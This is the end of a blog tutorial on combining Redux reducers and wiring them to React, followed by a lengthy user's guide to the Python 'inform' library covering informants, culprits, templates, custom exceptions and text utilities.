least these two questions. Let’s say our application has a bigger state then just money. Let’s say it has money and awesomeness. How do we do this? We can just create 2 reducers! function moneyReducer(state = 0, action) { switch(action.type) { case ADD_MONEY: return state + action.amount default: return state } } function awesomenessReducer(state = 0, action) { switch(action.type) { case INCREASE_AWESOMENESS: return state + action.amount default: return state } } And then combine them like this: function mainReducer(state = {}, action) { return { money: moneyReducer(state.money, action), awesomeness: awesomenessReducer(state.awesomeness, action) } } let store = createStore(mainReducer) This will result in both reducers output being combined into one object. We could also use a helper provided by redux: import { combineReducers, createStore } from 'redux' let store = createStore(combineReducers({ money: moneyReducer awesomeness: awesomenessReducer })) This has the exact same result and is completely optional, but can be more convenient. Get state still works the same, but now it returns an object with two properties: store.getState() // => { money: 0, awesomeness: 0 } store.dispatch(addMoney(500000)) store.getState() // => { money: 500000, awesomeness: 0 } The store updates the state according to the action you pass to it. There are no weird side effects, just simple input output logic. Wiring up React So how do we wire the store up to a view? I mean, all this stuff is fun, but we want to interact with it right, otherwise what’s the point? Let’s do this example with, yes, React. First we create a React Component: import React, { Component } from 'react' import { connect, Provider } from 'react-redux' class MyCoolComponent extends Component { constructor(props, context) { super(props, context) this.giveMoney = this.giveMoney.bind(this) } giveMoney(e) { e.preventDefault() this.props.dispatch(addMoney(10)) } render() { const { money, awesomeness } = this.props return ( <div> <p>`I have ${money}€, and I\'m ${awesomeness} awesome!`</p> <button onClick={this.giveMoney}>Give me 10€</button> </div> ) } } This component needs the money and awesomeness props to be passed to it. It will then render a nice message about me and a button to give me more money :). If someone clicks the button, the giveMoney method is called. It will need the dispatch function from the store (also passed via the props) and then pass the addMoney action to the dispatch function. Now we have to connect the component to redux, so that it can pass us the money and awesomeness props. To do this we will use the package ‘react-redux‘, which will ‘connect‘ our view to our store. This will let the view update automatically when the state of the store changes. import { connect, Provider } from 'react-redux' connect((state) => state)(MyCoolComponent) ReactDOM.render( <Provider store={store}> <MyCoolComponent> </Provider>, document.getElementById('container') ) First we import the connect function and the Provider component from ‘react-redux‘. Then we connect MyCoolComponent to the store. The connect method takes a function that allows you to control how the state is passed to the component. For now just (state) => state will be sufficient. Then we pass MyCoolComponent to the function connect returns, our component is now ready for connection with redux. At last we render our component into the DOM, but we wrap it in the Provider component. We pass the Provider component the store, the Provider will now connect the ‘connected‘ components inside of it with the store. And that’s it. Our component now updates when the state of the store changes. Conclusion I think this is enough for this article. If you are confused right now, don’t worry, it takes some time to get your head around the concept. It’s a bit different from what you might be used to. There is a lot more you can do with redux (like middleware, debug tooling) and it has a very vibrant community around it. The documentation of redux is very good and the library is maintained actively. The only way to learn more about it, is to play with it! Happy playing! Reference - Redux documentation: rackt.github.io/redux/docs/introduction - Redux on GitHub: github.com/rackt/redux - React-redux: github.com/rackt/react-redux - Flux: facebook.github.io/flux
https://wecodetheweb.com/2015/09/29/functionally-managing-state-with-redux/
CC-MAIN-2019-18
refinedweb
1,361
68.06
<< Arjun Amin2,228 Points I have no idea what to do I have been asked: 'Great! Now override the add_item method. Use super() in it to make sure the item still gets added to the list.' Please assist me through the whole process because I don't understand the question. Thanks. class Inventory: def __init__(self): self.slots = [] def add_item(self, item): self.slots.append(item) class SortedInventory(Inventory): pass 5 Answers Christopher ShawPython Web Development Techdegree Graduate 58,236 Points Super allows you to call a function from the parent class. So effectively we are calling (running) the add_item function in the parent class. And sending it the item. def add_item(self, item): super().add_item(item) nicole lumpkinCourses Plus Student 5,328 Points I guess at this point I don't understand why I wouldn't include self like this: def add_item(self, item): super().add_item(self, item) Keith Ostertag16,619 Points Hmm... I'm still not getting this. Since we've already made SortedInventory a subclass of Inventory, then why do we need to use super to call the add_item method? Isn't the whole point of making it a subclass to pass all the methods down from the parent? At least at this point we haven't changed that method, correct? So is this just the first step in altering the add_item method for the SortedInventory class? Meaning, if we weren't planning to change this method we wouldn't be defining add_item in the SortedInventory class? GLEB CHEMBORISOV11,182 Points Try this: class SortedInventory(Inventory): def __init__(self, slots=[]): super().__init__() self.slots=slots def add_item(self,item): self.slots.append(item) Qiong Li4,192 Points class SortedInventory(Inventory): def add_item(self, item): super(SortedInventory,self).add_item(item) Denis Watida Machaka7,311 Points class SortedInventory(Inventory): def add_item(self,item): super().add_item(item) Derek Hawkins12,783 Points I would have to agree with everyone else. This example is extremely contrived and makes no sense to do. But this worked: class Inventory: def init(self): self.slots = [] def add_item(self, item): self.slots.append(item) class SortedInventory(Inventory): def add_item(self, item): super().add_item(item) nicole lumpkinCourses Plus Student 5,328 Points nicole lumpkinCourses Plus Student 5,328 Points Thanks Christopher, I too was confused by this!
https://teamtreehouse.com/community/i-have-no-idea-what-to-do-8
CC-MAIN-2022-27
refinedweb
380
51.55
/* getunique.c AKA Mozilla Firefox 3.5.3 Local Download Manager Exploit Jeremy Brown [0xjbrown41@gmail.com // jbrownsec.blogspot.com // krakowlabs.com] 10.28.2009 ************************************************************************************************************ a file. A file of our choosing will appear in the download history (as a "ghost pointer", one mozilla guy noted). If the file doesn't automatically open (as most testing shows), then the average user is going to simply double click on the pointer in history anyways, opening our replacement file._ The download history will still show the name of the site that supplied the original file and the original filename even when the target user opened the our replacement file instead. Conditions that have to be met for exploitation to succeed: previous testing, if I recall correctly, the file opened automatically, as normal behavior; but that can no longer be confirmed) Firefox on Windows has slightly different results. I found during testing that when the download completes, the right file will be opened. Although unreliable, we were able to get the history of the file in download manager to show the replacement file and it will be opened if the user chooses to open it from there. Exploitation on Windows would be limited anyways due to the fact that you don't usually see as much remote access to do local things on Windows as its fairly common on Linux. On Linux it is also common for the replacement file to be kept in history when using this exploit, which can be useful for helping play off the exploit when you don't want the target to think anything much is out of the ordinary :); } That codes gives us a good look at how the scheme works. I tested the "Save As" option and it doesn't seem to be vulnerable (it saved, for example, file(1000000).zip). Yes, the header is roughly 3 times as many lines as the actual exploit code, but hey, this bug has a lot of details and ideas but is also very simple to exploit. linux@ubuntu:~$ ./getunique right zip /home/linux/Desktop/wrong.zip (target downloads right.zip and opens it the same filename, but with wrong.zip's contents) Muy Bueno :) Thunderbird doesn't seems to respond by not responding to the open when running the exploit. This code looks like its shared across Mozilla's codebase, so other applications like the SeaMonkey suite may be vulnerable as well. Mozilla also seems handle certain file types like tar.gz and tar.bz2 differently, see the code for more information.. you may even have to double click the file's entry in download manager if Firefox doesn't automatically open it. One way or another, though, this vulnerability is decently reliable, on Linux at least. ************************************************************************************************************ getunique.c */ #ifdef WIN32 #include <stdio.h> #include <windows.h> #else #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #endif #define MAGICN 9999 #define TMPLIN "/tmp" #define TMPWIN "C:\\Documents and Settings\\Administrator\\Local Settings\\Temp" void usage(char *app) { printf("\nMozilla Firefox 3.5.3 Local Download Manager Exploit"); printf("\nUsage: %s <target filename> <extension> <replacement file>\n\n", app); exit(0); } int main(int argc, char *argv[]) { char buf[256], *fn = argv[1], *ext = argv[2], *rf = argv[3]; int i; FILE *fd; if(argc < 3) usage(argv[0]); #ifdef WIN32 snprintf(buf, sizeof(buf), "%s\\%s.%s", TMPWIN, fn, ext); CopyFile(rf, buf, FALSE); #else snprintf(buf, sizeof(buf), "/bin/cp %s %s/%s.%s", rf, TMPLIN, fn, ext); system(buf); #endif for(i = 1; i <= MAGICN; i++) { memset(buf, 0, sizeof(buf)); #ifdef WIN32 snprintf(buf, sizeof(buf), "%s\\%s-%d.%s", TMPWIN, fn, i, ext); #else snprintf(buf, sizeof(buf), "%s/%s-%d.%s", TMPLIN, fn, i, ext); // default // snprintf(buf, sizeof(buf), "%s/%s.tar-%d.gz", TMPLIN, fn, i); // for tar.gz files // snprintf(buf, sizeof(buf), "%s/%s.tar-%d.bz2", TMPLIN, fn, i); // for tar.bz2 files // snprintf(buf, sizeof(buf), "%s/%s(%d).%s", TMPLIN, fn, i, ext); // for testing "Save As" #endif fd = fopen(buf, "w"); fclose(fd); } return 0; }
https://www.exploit-db.com/exploits/9882/
CC-MAIN-2017-04
refinedweb
685
65.12
Thanks. It works. Thanks. It works. Is there a way to disable (hide the "+" expansion icon) on a specific row under certain condition? Following the official example, let's say a Company does not have orders. In such chase there's... ExtJS 6: Set this on Application.js launch method: Ext.Ajax.defaultHeaders = { 'X-Requested-With' : 'XMLHttpRequest' }; Ext.Ajax.setConfig('withCredentials', true); ... I overrode Ext.data.proxy.Server So far it works for me. I'm not sure if there's any implication. It would be great if we could decide how we want the filters to be sent, since the default ExtJS... I'm trying this: Ext.define('App.ux.form.field.ComboBox', { extend: 'Ext.form.field.ComboBox', alias: 'widget.ux.combo', msgTarget: 'side', afterLabelTextTpl: new... Thanks. I'll keep an eye on it. Any workaround? This kind of basic functionality. It it resolved in ExtJS 6? Hi, I'm using Ext 5.1 I have a grid that shows 10 records. If I change data of those records by other means in the backend, and then I reload that grid. it keeps showing me the old data, which... Did anybody figure out this solution ? I also would like to send plain query parameters. By the way, why is this post here, instead of ExtJS 4 Q&A ? Found the solution. I search plugin was overriding the encodeFilters function. Base Model: Ext.define("App.model.Base", { extend: "Ext.data.Model", schema: { namespace: 'App.model', proxy: { type: 'rest', actionMethods:... Hi, I have a remote store. From the ViewController I'm trying to apply a filter to that store. this.getStore('users').filter('company',1234); The request to server is sent like this: ... Please go here: Cool, Thanks. This is what I did: store.remove(rec); store.sync({ callback: function(batch, options){ if(batch.exception){ Hi, I'm using Rest Proxy. When I delete a model with erase() it is removed from store whether it is successfully delete it on the server or not. How can I prevent that ? I need to keep the... HI, Let say I want to edit a user model. I change properties, and then call save. The request goes like this: PUT Here is the solution to dynamically handle the rootProperty content for collections or single records: rootProperty: function(raw) { return raw._embedded ?... What about loading a model directly: App.model.User.load('xxxxxxxxxxxxxxxxx', { callback: function(model) { } }); In this case, according to HAL standards, I won't get a... Hi, Trying to load a model via REST, but the id I provide is not sent. Instead, the phantom generated value is sent: "User-1" var user = Ext.create('App.model.User'); ... Found it (assuming that "currentRec" is defined in the ViewController) bind: { store: '{groups}', value: '{currentRec.groupId}' } bind.selection is not required. Hi, I want to update a property of a model when a combo record is selected. In this case, a User belongs to a Group, so when I select a group from the combo, I want to assign that value to... Hi, Let say I have this class: Ext.define('App.view.PersonGrid', { extend: 'App.ux.grid.Panel', xtype: 'people-grid', bind: '{people}', reference: 'person-grid',
https://www.sencha.com/forum/search.php?s=0c571b8d0494aef2dc235d6219177846&searchid=19740994
CC-MAIN-2017-43
refinedweb
532
62.85
User’s Guide¶ Using Informants¶ This package defines a collection of ‘print’ functions that are referred to as informants. They include include log, comment, codicil, narrate, display, output, notify, debug, warn, error, fatal and panic. They all take arguments in a manner that is a generalization of Python’s built-in print function. Each of the informants is used for a specific purpose, but they all take and process arguments in the same manner. These functions are distinguished in the Predefined Informants section. In this section, the manner in which they process their arguments is presented. With the simplest use of the program, you simply import the informants you need and call them, placing those things that you wish to print in the argument list as unnamed arguments: >>> from inform import display >>> display('ice', 9) ice 9 Informant Arguments¶ By default, all of the unnamed arguments converted to strings and then joined together using a space between each argument. However, you can use named arguments to change this behavior. The following named arguments are used to control the informants: - sep = ‘ ‘: - Specifies the string used to join the unnamed arguments. - end = ‘\n’: - Specifies a string to append to the message. - file: - The destination stream (a file pointer). - flush = False: - Whether the message should flush the destination stream (not available in python2). - culprit = None: - A string that is added to the beginning of the message that identifies the culprit (the object for which the problem being reported was found). May also be a number or a tuple that contains strings and numbers. If culprit is a tuple, the members are converted to strings and joined with culprit_sep (default is ‘, ‘). - codicil = None: - A string or a collection of strings that contain messages that are printed after the primary message. - wrap = False: - Specifies whether message should be wrapped. wrap may be True, in which case the default width of 70 is used. Alternately, you may specify the desired width. The wrapping occurs on the final message after the arguments have been joined. - template = None: - A template that if present interpolates the arguments to form the final message rather than simply joining the unnamed arguments with sep. The template is a string, and its format method is called with the unnamed and named arguments of the message passed as arguments. template may also be a collection of strings, in which case the first template for which all the necessary arguments are available is used. - remove: - Specifies the argument values that are unavailable to the template. The first four are also accepted by Python’s built-in print function and have the same behavior. This example makes use of the sep and end named arguments: >>> from inform import display >>> actions = ['r: rewind', 'p: play/pause', 'f: fast forward'] >>> display('The choices include', *actions, sep=',\n ', end='.\n') The choices include, r: rewind, p: play/pause, f: fast forward. Culprits¶ culprit is used to identify the target of the message. If the message is pointing out a problem, the culprit is generally the source of the problem. Here is a simple example: >>> from inform import error >>> error('file not found.', culprit='now-playing') error: now-playing: file not found. Here is an example that demonstrates the wrap and composite culprit features: >>> value = -1 >>> error( ... 'Encountered illegal value', ... value, ... 'when filtering. Consider regenerating the dataset.', ... culprit=('input.data', 32), wrap=True, ... ) error: input.data, 32: Encountered illegal value -1 when filtering. Consider regenerating the dataset. Occasionally the actual culprits are not available where the messages are printed. In this case you can use culprit caching. Simply cache the culprits in you informer using set_culprit() or add_culprit() and then recall them when needed using get_culprit(). Both set_culprit and add_culprit are designed to be used with Python’s with statement. The following example illustrates the used of culprit caching. Here, the code is spread over several functions, and the various culprits are known locally but are not passed directly into the function that may report the error. Rather than explicitly passing the culprits into the various functions, which would clutter up their argument lists, the culprits are cached in case they are needed. >>> from inform import add_culprit, get_culprit, set_culprit, error >>> def read_param(line, parameters): ... name, value = line.split(' = ') ... try: ... parameters[name] = float(value) ... except ValueError: ... error( ... 'expected a number, found:', value, ... culprit=get_culprit(name) ... ) >>> def read_params(lines): ... parameters = {} ... for lineno, line in enumerate(lines): ... with add_culprit(lineno+1): ... read_param(line, parameters) >>>>> with open(filename) as f, set_culprit(filename): ... lines = f.read().splitlines() ... parameters = read_params(lines) error: parameters, 3, c: expected a number, found: ack Templates¶ The template strings are the same as one would use with Python’s built-in format function and string method (as described in Format String Syntax). The template string can interpolate either named or unnamed arguments. In this example, named arguments are interpolated: >>> colors = { ... 'red': ('ff5733', 'failure'), ... 'green': ('4fff33', 'success'), ... 'blue': ('3346ff', None), ... } >>> for key in sorted(colors.keys()): ... val = colors[key] ... display(k=key, v=val, template='{k:>5s} = {v[0]}') blue = 3346ff green = 4fff33 red = ff5733 You can also specify a collection of templates. The first one for which all keys are available is used. For example; >>> for name in sorted(colors.keys()): ... code, desc = colors[name] ... display(name, code, desc, template=('{:>5s} = {} — {}', '{:>5s} = {}')) blue = 3346ff green = 4fff33 — success red = ff5733 — failure >>> for name in sorted(colors.keys()): ... code, desc = colors[name] ... display(k=name, v=code, d=desc, template=('{k:>5s} = {v} — {d}', '{k:>5s} = {v}')) blue = 3346ff green = 4fff33 — success red = ff5733 — failure The first loop interpolates positional (unnamed) arguments, the second interpolates the keyword (named) arguments. By default, the values that are considered unavailable and so will invalidate a template are those that would be False when cast to a Boolean. So, by default, the following values are considered unavailable: 0, False, None, ‘’, (), [], {}, etc. You can use the remove named argument to control this. remove may be a function, a collection, or a scalar. The function would take a single argument that is the value to consider and return True if the value should be unavailable. The scalar or the collection simply specifies the value or values that should be unavailable. >>> accounts = dict(checking=1100, savings=0, brokerage=None) >>> for name, amount in sorted(accounts.items()): ... display(name, amount, template=('{:>10s} = ${}', '{:>10s} = NA'), remove=None) brokerage = NA checking = $1100 savings = $0 Predefined Informants¶ The following informants are predefined in Inform. You can create custom informants using InformantFactory. All of the informants except panic and debug do not produce any output if mute is set. log¶ log = InformantFactory( output=False, log=True, ) Saves a message to the log file without displaying it. comment¶ comment = InformantFactory( output=lambda informer: informer.verbose and not informer.mute, log=True, message_color='cyan', ) Displays a message only if verbose is set. Logs the message. The message is displayed in cyan when writing to the console. Comments are generally used to document unusual occurrences that might warrant the user’s attention. codicil¶ codicil = InformantFactory(is_continuation=True) Continues a previous message. Continued messages inherit the properties (output, log, message color, etc) of the previous message. If the previous message had a header, that header is not output and instead the message is indented. >>> from inform import Inform, warn, codicil >>> informer = Inform(prog_name="myprog") >>> warn('file not found.', culprit='ghost') myprog warning: ghost: file not found. >>> codicil('skipping') skipping narrate¶ narrate = InformantFactory( output=lambda informer: informer.narrate and not informer.mute, log=True, message_color='blue', ) Displays a message only if narrate is set. Logs the message. The message is displayed in blue when writing to the console. Narration is generally used to inform the user as to what is going on. This can help place errors and warnings in context so that they are easier to understand. Distinguishing narration from comments allows them to colored differently and controlled separately. display¶ display = InformantFactory( output=lambda informer: not informer.quiet and not informer.mute, log=True, ) Displays a message if quiet is not set. Logs the message. >>> from inform import display >>> display('We the people ...') We the people ... output¶ output = InformantFactory( output=lambda informer: not informer.mute, log=True, ) Displays and logs a message. This is used for messages that are not errors and that are noteworthy enough that they need to get through even though the user has asked for quiet. >>> from inform import output >>> output('The sky is falling!') The sky is falling! notify¶ notify = InformantFactory( notify=True, log=True, ) Temporarily display the message in a bubble at the top of the screen. Also sends it to the log file. This is used for messages that the user is otherwise unlikely to see because they have no access to the standard output. When using notify you may pass in the urgency named argument to specify the urgency of the notification. Its value must ‘low’, ‘normal’, or ‘critical’ or it will be ignored. debug¶ debug = InformantFactory( severity='DEBUG', output=True, log=True, header_color='magenta', ) Displays and logs a debugging message. A header with the label DEBUG is added to the message and the header is colored magenta. >>> from inform import Inform, debug >>> informer = Inform(prog_name="myprog") >>> debug('HERE!') myprog DEBUG: HERE! Generally one does not use the debug informant directly. Instead one uses the available debugging functions: aaa(), ddd(), ppp(), sss() and vvv(). warn¶ warn = InformantFactory( severity='warning', header_color='yellow', output=lambda informer: not informer.quiet and not informer.mute, log=True, ) Displays and logs a warning message. A header with the label warning is added to the message. The header is colored yellow when writing to the console. >>> from inform import Inform, warn >>> informer = Inform(prog_name="myprog") >>> warn('file not found, skipping.', culprit='ghost') myprog warning: ghost: file not found, skipping. error¶ error = InformantFactory( severity='error', is_error=True, header_color='red', output=lambda informer: not informer.mute, log=True, ) Displays and logs an error message. A header with the label error is added to the message. The header is colored red when writing to the console. >>> from inform import Inform, error >>> informer = Inform(prog_name="myprog") >>> error('invalid value specified, expected a number.', culprit='count') myprog error: count: invalid value specified, expected a number. fatal¶ fatal = InformantFactory( severity='error', is_error=True, terminate=1, header_color='red', output=lambda informer: not informer.mute, log=True, ) Displays and logs an error message. A header with the label error is added to the message. The header is colored red when writing to the console. The program is terminated with an exit status of 1. >> from inform import fatal, os_error >> try: .. with open('config') as f: .. read_config(f.read()) .. except OSError as e: .. fatal(os_error(e), codicil='Cannot continue.') myprog error: config: file not found Cannot continue. panic¶ panic = InformantFactory( severity='internal error (please report)', is_error=True, terminate=3, header_color='red', output=True, log=True, ) Displays and logs a panic message. A header with the label internal error is added to the message. The header is colored red when writing to the console. The program is terminated with an exit status of 3. Modifying Existing Informants¶ You may adjust the behavior of existing informants by overriding the attributes that were passed in when they were created. For example, in many cases you might prefer that normal program output is not logged, either because it is voluminous or because it is sensitive. In that case you can simply override the log attributes for the display and output informants like so: from inform import display, output display.log = False output.log = False Any attribute that can be passed into InformantFactory when creating an informant can be overridden. However, when overriding a color you must use a colorizer rather than a color name: from inform import comment, Color comment.message_color=Color('cyan') Informant Control¶ For more control of the informants, you can import and instantiate the Inform class along with the desired informants. This gives you the ability to specify options: >>> from inform import Inform, display, error >>> Inform(logfile=False, prog_name=False, quiet=True) <...> >>> display('hello') >>> error('file not found.', culprit='data.in') error: data.in: file not found. In this example the logfile argument disables opening and writing to the logfile. The prog_name argument stops Inform from adding the program name to the error message. And quiet turns off non-essential output, and in this case it causes the output of display to be suppressed. An object of the Inform class is referred to as an informer (not to be confused with the print functions, which are referred to as informants). Once instantiated, you can use the informer to change various settings, terminate the program, return a count of the number of errors that have occurred, etc. >>> from inform import Inform, error >>> informer = Inform(prog_name="prog") >>> error('file not found.', culprit='data.in') prog error: data.in: file not found. >>> informer.errors_accrued() 1 You can also use a with statement to invoke the informer. This activates the informer for the duration of the with statement, returning to the previous informer when the with statement terminates. This is useful when writing tests. In this case you can provide your own output streams so that you can access the normally printed output of your code: >>> from inform import Inform, display >>> import sys >>> if sys.version[0] == '2': ... # io assumes unicode, which python2 does not provide by default ... # so use StringIO instead ... from StringIO import StringIO ... # Add support for with statement by monkeypatching ... StringIO.__enter__ = lambda self: self ... StringIO.__exit__ = lambda self, exc_type, exc_val, exc_tb: self.close() ... else: ... from io import StringIO >>> def run_test(): ... display('running test') >>> with StringIO() as stdout, \ ... StringIO() as stderr, \ ... StringIO() as logfile, \ ... Inform(stdout=stdout, stderr=stderr, logfile=logfile) as msg: ... run_test() ... ... num_errors = msg.errors_accrued() ... output_text = stdout.getvalue() ... error_text = stderr.getvalue() ... logfile_text = logfile.getvalue() >>> num_errors 0 >>> str(output_text) 'running test\n' >>> str(error_text) '' >>> str(logfile_text.strip().split('\n')[-1]) 'running test' Logfiles¶ To configure Inform to generate a logfile you can specify the logfile to Inform or to Inform.set_logfile(). The logfile can be specified as a string, a pathlib.Path, an open stream, or as a Boolean. If True, a logfile is created and named ./<prog_name>.log. If False, no logfile is created. In addition, if you want to defer the decision on what should be the logfile without losing the log messages that occur before the ultimate destination of those messages is set, you can use an instance of LoggingCache, which simply saves the messages in memory until it is replaced, at which point they are transferred to the new logfile. For: ... This message is cached. This message is not cached. An existing logfile will be renamed before creating the logfile if you specify prev_logfile_suffix to Inform. Message Destination¶ You can specify the output stream when creating an informant. If you do not, then the stream uses is under the control of Inform’s stream_policy argument. If stream_policy is set to ‘termination’, then all messages are sent to the standard output except the final termination message, which is set to standard error. This is suitable for programs whose output largely consists of status messages rather than data, and so would be unlikely to be used in a pipeline. If stream_policy is ‘header’. then all messages with headers (those messages produced from informants with severity) are sent to the standard error stream and all other messages are sent to the standard output. This is more suitable for programs whose output largely consists of data and so would likely be used in a pipeline. It is also possible for stream_policy to be a function that takes three arguments, the informant and the standard output and error streams. It should return the desired stream. If True is passed to the notify_if_no_tty Inform argument, then error messages are sent to the notifier if the standard output is not a TTY. User Defined Informants¶ You can create your own informants using InformantFactory. One application of this is to support multiple levels of verbosity. To do this, an informant would be created for each level of verbosity, as follows: >>> of Inform. In this case Inform simply saves the value and makes it available as an attribute, and it is this attribute that is queried by the lambda function passed to InformantFactory when creating the informants. Another use for user-defined informants is to create print functions that output is a particular color: >>> from inform import InformantFactory >>> succeed = InformantFactory(message_color='green') >>> fail = InformantFactory(message_color='red') >>> succeed('This message would be green.') This message would be green. >>> fail('This message would be red.') This message would be red. A common use for this would be to have success and failure messages. For example, if your program runs a series of tests, the successes could be printed in green and the failures in red. In addition, the success informant may be configured to suppress the messages if the user asks for quiet. In that case, only the failures would be displayed. Exceptions¶ An exception, Error, is provided that takes the same arguments as an informant. This allows you to catch the exception and handle it if you like. Any arguments you pass into the exception are retained and are available when processing the exception. The exception provides the Error.report() and Error. Besides culprit, you can use any of the named arguments accepted by informants. In addition, you can also use informant as a named argument. informant changes the informant that is used when reporting the error. It is often used to convert an exception to a warning or to a fatal error. For example: >>> from inform import Inform, Error, warn >>> Inform(prog_name='myprog') <...> >>> def read_files(filenames): ... files = {} ... for filename in filenames: ... try: ... with open(filename) as f: ... files[filename] = f.read() ... except FileNotFoundError: ... raise Error('missing.', culprit=filename, informant=warn) ... return files >>> filenames = 'parameters swallows worlds'.split() >>> try: ... files = read_files(filenames) ... except Error as e: ... files = None ... e.report() myprog warning: worlds: missing. Error also provides Error.get_message() and Error.get_culprit() methods, which return the message and the culprit. You can also cast the exception to a string or call the Error.render() method to get a string that contains both the message and the culprit formatted so that it can be shown to the user. All positional arguments are available in e.args and any keyword arguments provided are available in e.kwargs. One common approach to using Error is to pass all the arguments that make up the error message as, choices=known_names, template="name '{}' is not defined.") ... except Error as e: ... candidates = get_close_matches(e.args[0], e.choices, 1, 0.6) ... candidates = conjoin(candidates, conj=' or ') ... e.report() ... codicil(fmt('Did you mean {candidates}?')) myprog error: name 'alfa' is not defined. Did you mean alpha? Notice that useful information (choices) is passed into the exception that may be useful when processing the exception even though it is not incorporated into the message. You can override the template by passing a new one to Error.get_message() or Error.render(). With Error.report() or Error.terminate() you can override any named argument, such as template or culprit. This can be helpful if you need to translate a message or change it to make it more meaningful to the end user: >>> try: ... raise Error(name, template="name '{}' is not defined.") ... except Error as e: ... e.report(template="'{}' ist nicht definiert.") myprog error: 'alfa' ist nicht definiert. You can catch an Error exception and then reraise it after modifying its named arguments using Error.reraise(). This is helpful when all the information needed for the error message is not available where the initial exception is detected. Typically new culprits or codicils are added. For example, in the following the filename is added to the exception using reraise in parse_file: >>> def parse_lines(lines): ... values = {} ... for i, line in enumerate(lines): ... try: ... k, v = line.split() ... except ValueError: ... raise Error('syntax error.', culprit=i+1) ... values[k] = v ... return values >>> def parse_file(filename): ... try: ... with open(filename) as f: ... return parse_lines(f.read().splitlines()) ... except Error as e: ... e.reraise(culprit=e.get_culprit(filename)) >>> try: ... unladen_airspeed = parse_file('swallows') ... except Error as e: ... e.report() myprog error: swallows, 2: syntax error. This example uses Error.get_culprit() to access the existing culprit or culprits of the exception. Regardless of how many there are, they are always returned as a culprit. It also accepts a culprit as an argument, which is returned along with and before the culprit from the exception. Also available is Error.get_codicil(), which behaves similarly except with codicils rather than culprits and the argument is added after the codicil from the exception rather than before. Subclassing Error¶ When creating subclasses of Error you can add a template to the subclass as a way of specifying the error message or messages that are to be used for that exception. For example: >>> class InvalidValueError(Error): ...>> try: ... raise InvalidValueError() ... except Error as e: ... e.report() myprog error: invalid value. You can include named and unnamed arguments of the exception in the template: >>> class InvalidValueError(Error): ...>> try: ... raise InvalidValueError('negative', culprit='rate') ... except Error as e: ... e.report() myprog error: rate: must not be negative. You can also specify a list of templates that are tried in order, the first for which all arguments are available is used: >>> class InvalidValueError(Error): ... template = [ ... '{} must fall between {min} and {max}.', ... '{} must be greater than {min}.', ... '{} must be less than {max}.', ... '{} must not be {illegal}.', ... '{} must be {legal}.', ... '{} is invalid.', ... 'invalid value.', ... ] >>> rate = -1.0 >>> try: ... if rate < 0: ... raise InvalidValueError(rate, illegal='negative', culprit='rate') ... except Error as e: ... e.report() myprog error: rate: -1.0 must not be negative. Utilities¶ Several utility functions are provided for your convenience. They are often helpful when creating messages. Color Class¶ The Color class creates colorizers, which are functions used to render text in a particular color. They combine their arguments in a manner very similar to an informant and returns the result as a string, except the string is coded for the chosen color. Uses the sep, template and wrap keyword arguments to combine the arguments. >>. The Color class has the concept of a colorscheme. There are four supported schemes: None, True, ‘light’, and ‘dark’. With None the text is not colored, with True the colorscheme of the currently active informer is used. In general it is best to use the ‘light’ colorscheme on dark backgrounds and the ‘dark’ colorscheme on light backgrounds. You can pass in the colorscheme using the scheme argument either to the color class or to the colorizer. Colorizers have one user settable attribute: enable. By default enable is True. If you set it to False the colorizer no longer renders the text in color: >> warning = Color('yellow') >> warning('This will be yellow on the console.') This will be yellow on the console. >> warning.enable = False >> warning('This will not be yellow.') This will not be yellow. Alternatively, you can enable or disable the colorizer when creating it. This example uses the Color.isTTY() method to determine whether the output stream, the standard output by default, is a console. >> warning = Color('yellow', enable=Color.isTTY()) >> warning('Cannot find precursor, ignoring.') Cannot find precursor, ignoring. columns¶ columns() distributes the values of an array over enough columns to fill the screen. This example prints out the phonetic alphabet: >>> from inform import columns >>> title = 'Display() >>> display(title, columns(words), sep='\n') Display conjoin¶ conjoin() is like ‘’.join(), but allows you to specify a conjunction that is placed between the last two elements. For example: >>> from inform import conjoin >>> conjoin(['a', 'b', 'c']) 'a, b and c' >>> conjoin(['a', 'b', 'c'], conj=' or ') 'a, b or c' If you prefer the use of the Oxford comma, you can add it as follow: >>> conjoin(['a', 'b', 'c'], conj=', and ') 'a, b, and c' You can specify a format string that is applied to every item in the list before they are joined: >>> conjoin([10.1, 32.5, 16.9], fmt='${:0.2f}') '$10.10, $32.50 and $16.90' cull¶ cull() strips items from a collection that have a particular value. The collection may be list-like (list, tuple, set, etc.) or a dictionary-like (dict, OrderedDict). A new collection of the same type is returned with the undesirable values removed. By default, cull() strips values that would be False when cast to a Boolean (0, False, None, ‘’, (), [], etc.). A particular value may be specified using the remove as a keyword argument. The value of remove may be a collection, in which case any value in the collection is removed, or it may be a function, in which case it takes a single item as an argument and returns True if that item should be removed from the list. >>> from inform import cull, display >>> display(*cull(['a', 'b', '', 'd']), sep=', ') a, b, d >>> accounts = dict(checking=1100.16, savings=13948.78, brokerage=0) >>> for name, amount in sorted(cull(accounts).items()): ... display(name, amount, template='{:>10s}: ${:,.2f}') checking: $1,100.16 savings: $13,948.78 dedent¶ Without its named arguments, dedent behaves just like, and is as equivalent replacement for, textwrap.dedent. - Args: -. - wrap (bool or int): - If true the string is wrapped using a width of 70. If an integer value is passed, is used as the width of the wrap. Examples: >>> did_you_mean¶ Given a candidate string from the user, return the closest valid choice. - Args: - candidate (string): - The string given by the user. - choices (iterable): - The set of valid strings that the user was expected to choose from. Examples: >>> from inform import did_you_mean >>> did_you_mean('cat', ['cat', 'dog']) 'cat' >>> did_you_mean('car', ['cat', 'dog']) 'cat' >>> did_you_mean('car', {'cat': 1, 'dog': 2}) 'cat' fmt¶ fmt() is similar to ‘’.format(), but it can pull arguments from the local scope. >>> from inform import conjoin, display, fmt >>> filenames = ['a', 'b', 'c', 'd'] >>>>> display( ... fmt( ... 'Reading {filetype} files: {names}.', ... names=conjoin(filenames), ... ) ... ) Reading CSV files: a, b, c and d.. format_range¶ func:format_range can be used to create a succinct, readable string representing a set of numbers. >>> from inform import format_range >>> format_range({1, 2, 3, 5}) '1-3,5' full_stop¶ full_stop() adds a period to the end of the string if needed (if the last character is not a period, question mark or exclamation mark). It applies str() to its argument, so it is generally a suitable replacement for str in str(exception) when trying extract an error message from an exception. This is generally useful if you need to print a string that should have punctuation, but may not. >>> from inform import Error, error, full_stop >>> found = 0 >>> try: ... if found is False: ... raise Error('not found', culprit='marbles') ... elif found < 3: ... raise Error('insufficient number.', culprit='marbles') ... raise Error('not found', culprit='marbles') ... except Error as e: ... error(full_stop(e)) myprog error: marbles: insufficient number. indent¶ indent() indents text. Multiples of leader are added to the beginning of the lines to indent. first is the number of indentations used for the first line relative to the others (may be negative but (first + stops) 